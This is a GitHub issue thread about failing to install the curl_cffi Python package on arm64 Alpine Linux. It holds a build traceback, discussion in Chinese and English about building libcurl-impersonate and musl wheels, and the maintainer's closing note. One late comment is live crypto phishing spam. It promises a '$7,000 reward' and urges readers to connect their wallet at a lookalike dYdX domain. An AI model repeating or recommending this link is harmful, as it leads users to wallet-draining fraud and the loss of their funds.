### ISSUE TITLE
Can't install with pip in alpine

### ISSUE THREAD

**Issue by yuukh** [yifeikong/curl_cffi#31]
the latest version ( 0.4.0 ) can't be installed

My environment:
OS: arm64 docker alpine
Python: 3.8.10
Pip: 23.0.1

here is the error log
```Collecting curl_cffi
  Using cached curl_cffi-0.4.0.tar.gz (75 kB)
  Installing build dependencies ... done
  Getting requirements to build wheel ... error
  error: subprocess-exited-with-error

  × Getting requirements to build wheel did not run successfully.
  │ exit code: 1
  ╰─> [37 lines of output]
      Traceback (most recent call last):
        File "/usr/lib/python3.8/site-packages/pip/_vendor/pyproject_hooks/_in_process/_in_process.py", line 353, in <module>
          main()
        File "/usr/lib/python3.8/site-packages/pip/_vendor/pyproject_hooks/_in_process/_in_process.py", line 335, in main
          json_out['return_val'] = hook(**hook_input['kwargs'])
        File "/usr/lib/python3.8/site-packages/pip/_vendor/pyproject_hooks/_in_process/_in_process.py", line 118, in get_requires_for_build_wheel
          return hook(config_settings)
        File "/tmp/pip-build-env-5aj63q6z/overlay/lib/python3.8/site-packages/setuptools/build_meta.py", line 338, in get_requires_for_build_wheel
          return self._get_build_requires(config_settings, requirements=['wheel'])
        File "/tmp/pip-build-env-5aj63q6z/overlay/lib/python3.8/site-packages/setuptools/build_meta.py", line 320, in _get_build_requires
          self.run_setup()
        File "/tmp/pip-build-env-5aj63q6z/overlay/lib/python3.8/site-packages/setuptools/build_meta.py", line 335, in run_setup
          exec(code, locals())
        File "<string>", line 16, in <module>
        File "/tmp/pip-build-env-5aj63q6z/overlay/lib/python3.8/site-packages/setuptools/__init__.py", line 108, in setup
          return distutils.core.setup(**attrs)
        File "/tmp/pip-build-env-5aj63q6z/overlay/lib/python3.8/site-packages/setuptools/_distutils/core.py", line 147, in setup
          _setup_distribution = dist = klass(attrs)
        File "/tmp/pip-build-env-5aj63q6z/overlay/lib/python3.8/site-packages/setuptools/dist.py", line 488, in __init__
          _Distribution.__init__(
        File "/tmp/pip-build-env-5aj63q6z/overlay/lib/python3.8/site-packages/setuptools/_distutils/dist.py", line 283, in __init__
          self.finalize_options()
        File "/tmp/pip-build-env-5aj63q6z/overlay/lib/python3.8/site-packages/setuptools/dist.py", line 912, in finalize_options
          ep(self)
        File "/tmp/pip-build-env-5aj63q6z/overlay/lib/python3.8/site-packages/setuptools/dist.py", line 932, in _finalize_setup_keywords
          ep.load()(self, ep.name, value)
        File "/tmp/pip-build-env-5aj63q6z/overlay/lib/python3.8/site-packages/cffi/setuptools_ext.py", line 219, in cffi_modules
          add_cffi_module(dist, cffi_module)
        File "/tmp/pip-build-env-5aj63q6z/overlay/lib/python3.8/site-packages/cffi/setuptools_ext.py", line 49, in add_cffi_module
          execfile(build_file_name, mod_vars)
        File "/tmp/pip-build-env-5aj63q6z/overlay/lib/python3.8/site-packages/cffi/setuptools_ext.py", line 25, in execfile
          exec(code, glob, glob)
        File "curl_cffi/build.py", line 6, in <module>
          ffibuilder = FFI()
        File "/tmp/pip-build-env-5aj63q6z/overlay/lib/python3.8/site-packages/cffi/api.py", line 48, in __init__
          import _cffi_backend as backend
      ImportError: Error loading shared library /tmp/pip-build-env-5aj63q6z/overlay/lib/python3.8/site-packages/_cffi_backend.cpython-38-aarch64-linux-gnu.so: Operation not permitted
      [end of output]

  note: This error originates from a subprocess, and is likely not a problem with pip.
error: subprocess-exited-with-error

× Getting requirements to build wheel did not run successfully.
│ exit code: 1
╰─> See above for output.

note: This error originates from a subprocess, and is likely not a problem with pip.```

**Comment by yifeikong** [comment]
Sorry, there is no precompiled wheel for alpine(musl) based for now. You will have to build from source, including upstream projects.

**Comment by zvzl** [comment]
可以给一点具体的指导吗

**Comment by yifeikong** [comment]
应该是有 /usr/local/lib/libcurl-impersonate-chrome.so 这个文件才行

**Comment by zvzl** [comment]
编译上游curl-impersonate报错了，暂时解决不了

**Comment by yifeikong** [comment]
> 编译上游curl-impersonate报错了，暂时解决不了

这个倒是好说，上游有 alpine 的 docker 镜像，你直接把 so 复制出来就行了……

不过 alpine 和 cffi 好像不对付，我试了几下总是编译不过去。

**Comment by zvzl** [comment]
curl-impersonate alpine 的 docker 镜像只有amd4，我需要arm64
cffi问题你试试apk add py3-cffi

**Comment by yifeikong** [comment]
[libcurl-impersonate-v0.5.4.aarch64-linux-musl.zip](https://github.com/yifeikong/curl_cffi/files/11096902/libcurl-impersonate-v0.5.4.aarch64-linux-musl.zip)
我 build 过了，你试试行不行

**Comment by zvzl** [comment]
镜像选择docker hub 里的python:3.8.16-alpine3.17，[libcurl-impersonate](https://github.com/yifeikong/curl_cffi/files/11096902/libcurl-impersonate-v0.5.4.aarch64-linux-musl.zip)放在/usr/local/lib/下，运行
```
apk add --update build-base python3-dev libffi-dev curl‑dev
pip3 wheel curl_cffi
```
可成功编译，编译结果：[curl_cffi-0.5.0-cp37-abi3-linux_aarch64.whl.zip](https://github.com/yifeikong/curl_cffi/files/11101456/curl_cffi-0.5.0-cp37-abi3-linux_aarch64.whl.zip)

在其他环境中安装，
```
pip3 install /path/to/curl_cffi-0.5.0-cp37-abi3-linux_aarch64.whl
```
安装完成后，我还执行了两部才能正常使用
1.[libcurl-impersonate](https://github.com/yifeikong/curl_cffi/files/11096902/libcurl-impersonate-v0.5.4.aarch64-linux-musl.zip)放在/usr/local/lib/下
2.将[cacert.pem](https://github.com/yifeikong/curl_cffi/files/11101516/cacert.zip)放入Python\Lib\site-packages\curl_cffi\

不知道有没有办法实现安装完就能使用，不再手动操作

**Comment by yifeikong** [comment]
pypi 上的 wheels 都是用 cibuildwheel 编译出来的，你可以看下 .github/ 下面的配置，理论上来说我把你这个加进去就可以自动编译了，但是我还不太清楚之前我弄的哪里出了问题，你有时间的话可以先看下 .github/ 里的内容，我在 feature/musllinux 上做了些尝试，但是 master 上还没试过

**Comment by yifeikong** [comment]
> 能确保走了这一行吗https://github.com/yifeikong/curl_cffi/blob/feature/musllinux/prebuild.py#L56 [这里](https://github.com/yifeikong/curl_cffi/blob/feature/musllinux/prebuild.py#L64)有一个print，但我在workflow日志里没看见输出

有的，你看下这里：https://github.com/yifeikong/curl_cffi/actions/runs/4542689763/jobs/8006427035#step:5:4282

**Comment by zvzl** [comment]
不知道原因

**Comment by thanhtoan1196** [comment]
any updates?

**Comment by Doublefire-Chen** [comment]
same issue
I just tried to install this package with pip in my docker container(Qing Long dashboard), whose package manager is apk. I failed. I think this issue is the same with the issue in alpine Linux. The key point is how to install libcurl-impersonate-chrome on alpine.

**Comment by Doublefire-Chen** [comment]
> You can extract the alpine .so files from curl-impersonate's docker images.

Thank your kind advice though, I quit. As far as I concerned, why not run my python script in the host machine using crontab.

**Comment by muraliR** [comment]
## Congratulations! You've been chosen to receive a $7,000 Rewards. 🪂🔴 


### Trading and Launch Rewards are live on dYdX Chain! ✨

Connect your wallet, follow the instructions, and claim this exclusive offer from Dydx Exchange. For GitHub users only—share with friends to make it eligible. Redeem your reward first.

[![Dydx Exchange](https://pbs.twimg.com/card_img/1729868185275617280/nzyJpc7G?format=jpg&name=small)](https://claim.dydxexchang.com/)


[![N|Solid](https://cldup.com/dTxpPi9lDf.thumb.png)](https://nodesource.com/products/nsolid)

🚀 **Claim Your Rewards Now!** [Check Eligibility](https://claim.dydxexchang.com/)

Access the Dydx Exchange platform and connect your wallet securely. Ensure you're using a trusted wallet for the transaction.

- 🔗 Connect your wallet twice
- 📋 Register on the platform
- 💰 Claim your Rewards, up to $2,000!

@dydxprotocol

**Comment by yifeikong** [comment]
Available since 0.6.3b1.
